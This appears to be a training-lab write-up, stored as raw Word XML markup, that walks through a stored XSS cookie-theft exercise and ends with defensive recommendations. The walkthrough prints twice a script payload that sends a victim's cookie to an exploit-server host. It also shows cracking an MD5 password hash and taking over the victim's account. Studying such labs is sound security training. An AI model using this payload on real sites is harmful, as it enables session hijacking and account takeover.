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4FEBDB23" w14:textId="2487D639" w:rsidR="00B94D21" w:rsidRDefault="003A35F2" w:rsidP="002C34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A35F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>This lab stores the user's password hash in a cookie and has an XSS vulnerability within the comment functionality. The objective is to obtain Carlos's stay-logged-in cookie, use it to crack his password, and then log in as 'carlos' to delete his account from the "My account" page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582CC83F" w14:textId="77777777" w:rsidR="002C34F5" w:rsidRDefault="002C34F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7D41963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70BAA9E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With Burp running, use your provided credentials (wiener:peter) to investigate the "Stay logged in" functionality. Observe that the stay-logged-in cookie is Base64 encoded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459D5646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In Burp's Proxy &gt; HTTP history tab, inspect the response to your login request. Highlight the stay-logged-in cookie. The format appears as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4003A454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username+':'+md5HashOfPassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C40FBE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Set out to steal the victim (carlos) user's cookie. Notice that the comment section has an XSS vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9CD514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Navigate to the exploit server and record the URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA706B4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Visit one of the blog posts and submit a comment with the stored XSS payload (replace 'YOUR-EXPLOIT-SERVER-ID' with your unique ID):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB90833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&lt;script&gt;document.location='//YOUR-EXPLOIT-SERVER-ID.exploit-server.net/'+document.cookie&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147C5A15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Check the exploit server's access log. A GET request from the victim, which contains their stay-logged-in cookie, should be present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01988B09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Use Burp Decoder to decode the cookie. You'll find:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541A7C9C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carlos:26323c16d5f4dabff3bb136f2460a943</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172B4A30" w14:textId="77777777" w:rsidR="003A35F2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Search the hash (26323c16d5f4dabff3bb136f2460a943) using a search engine, revealing the password as onceuponatime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BD13B0" w14:textId="683F9013" w:rsidR="00D94F31" w:rsidRPr="003A35F2" w:rsidRDefault="003A35F2" w:rsidP="003A35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Log in as 'carlos' using the deciphered password. Navigate to the "My account" page and proceed to delete the account, thereby solving the lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA0BF50" w14:textId="77777777" w:rsidR="00053984" w:rsidRDefault="00053984" w:rsidP="000E39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5BC66" w14:textId="5F1B1FD3" w:rsidR="00BF4CBD" w:rsidRPr="00053984" w:rsidRDefault="00583B25" w:rsidP="000539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13F803F" w14:textId="158639BB" w:rsidR="00BF4CBD" w:rsidRPr="00053984" w:rsidRDefault="003A35F2" w:rsidP="00053984">
      <w:p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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;script&gt;document.location='//YOUR-EXPLOIT-SERVER-ID.exploit-server.net/'+document.cookie&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A773614" w14:textId="77777777" w:rsidR="000E39C0" w:rsidRDefault="000E39C0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23B52" w14:textId="05668430" w:rsidR="009D665A" w:rsidRDefault="00421B9E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1B9E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B9456B8" wp14:editId="751A54C6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3338195</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6286500" cy="1385570"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="123513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48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B9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11FC53D" wp14:editId="6E078F12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438775" cy="2548890"/>
            <wp:effectExtent l="0" t="0" r="9525" b="3810"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="179334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409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B9E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209EC7E" wp14:editId="4BF4748B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5024120</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5715000" cy="2287905"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="125257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18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31F52A99" w14:textId="77777777" w:rsidR="00421B9E" w:rsidRDefault="00421B9E" w:rsidP="00421B9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67F1B8" w14:textId="78FD557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8F487D9" w14:textId="77777777" w:rsidR="003A35F2" w:rsidRPr="003A35F2" w:rsidRDefault="003A35F2" w:rsidP="003A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b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Secure Cookies:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A35F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Store sensitive information, like password hashes, server-side rather than in cookies. Cookies can be intercepted or manipulated by attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080C7D02" w14:textId="77777777" w:rsidR="003A35F2" w:rsidRPr="003A35F2" w:rsidRDefault="003A35F2" w:rsidP="003A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b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Implement XSS Protections:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A35F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use Content Security Policy (CSP) headers, and ensure that all user input is properly sanitized and encoded before rendering on the webpage to prevent XSS attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62245BCA" w14:textId="77777777" w:rsidR="003A35F2" w:rsidRPr="003A35F2" w:rsidRDefault="003A35F2" w:rsidP="003A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b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Password Storage:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A35F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hash passwords using modern cryptographic algorithms like bcrypt or Argon2, and avoid using MD5 which is considered insecure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA32F70" w14:textId="6F6F3269" w:rsidR="0020611D" w:rsidRPr="003A35F2" w:rsidRDefault="003A35F2" w:rsidP="003A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35F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Monitoring and Logging:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A35F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Monitor access logs to detect unusual activities, like multiple users being redirected to an unfamiliar domain.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0020611D" w:rsidRPr="003A35F2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53984"/>
    <w:rsid w:val="00096FAA"/>
    <w:rsid w:val="000E39C0"/>
    <w:rsid w:val="000F71FF"/>
    <w:rsid w:val="0013528D"/>
    <w:rsid w:val="00196A89"/>
    <w:rsid w:val="0020611D"/>
    <w:rsid w:val="002104F3"/>
    <w:rsid w:val="00221EF8"/>
    <w:rsid w:val="0022627C"/>
    <w:rsid w:val="00244307"/>
    <w:rsid w:val="00255983"/>
    <w:rsid w:val="002815EF"/>
    <w:rsid w:val="002A7161"/>
    <w:rsid w:val="002C34F5"/>
    <w:rsid w:val="002C5E14"/>
    <w:rsid w:val="002E1DDF"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="003303B2"/>
    <w:rsid w:val="0033723D"/>
    <w:rsid w:val="003A35F2"/>
    <w:rsid w:val="00421B9E"/>
    <w:rsid w:val="00452779"/>
    <w:rsid w:val="004B245A"/>
    <w:rsid w:val="00562575"/>
    <w:rsid w:val="00583B25"/>
    <w:rsid w:val="005E0914"/>
    <w:rsid w:val="00602C28"/>
    <w:rsid w:val="00715E55"/>
    <w:rsid w:val="00726BA8"/>
    <w:rsid w:val="008019E2"/>
    <w:rsid w:val="0087497B"/>
    <w:rsid w:val="008947C1"/>
    <w:rsid w:val="008C69D8"/>
    <w:rsid w:val="00903604"/>
    <w:rsid w:val="00915A95"/>
    <w:rsid w:val="00971C02"/>
    <w:rsid w:val="00977AC7"/>
    <w:rsid w:val="00983B99"/>
    <w:rsid w:val="009D665A"/>
    <w:rsid w:val="00AA2AEF"/>
    <w:rsid w:val="00AB3531"/>
    <w:rsid w:val="00AD0984"/>
    <w:rsid w:val="00AF5602"/>
    <w:rsid w:val="00B076D8"/>
    <w:rsid w:val="00B13532"/>
    <w:rsid w:val="00B15D35"/>
    <w:rsid w:val="00B34704"/>
    <w:rsid w:val="00B349E1"/>
    <w:rsid w:val="00B82D92"/>
    <w:rsid w:val="00B94D21"/>
    <w:rsid w:val="00BB2D62"/>
    <w:rsid w:val="00BF4CBD"/>
    <w:rsid w:val="00C64A7F"/>
    <w:rsid w:val="00C70278"/>
    <w:rsid w:val="00C712A4"/>
    <w:rsid w:val="00C91B43"/>
    <w:rsid w:val="00D25F62"/>
    <w:rsid w:val="00D40A93"/>
    <w:rsid w:val="00D54F22"/>
    <w:rsid w:val="00D82CD2"/>
    <w:rsid w:val="00D94F31"/>
    <w:rsid w:val="00E142E1"/>
    <w:rsid w:val="00E172CF"/>
    <w:rsid w:val="00E9712F"/>
    <w:rsid w:val="00F05056"/>
    <w:rsid w:val="00F12F8B"/>
    <w:rsid w:val="00F149A3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2023-10-08T15:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-08T15:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>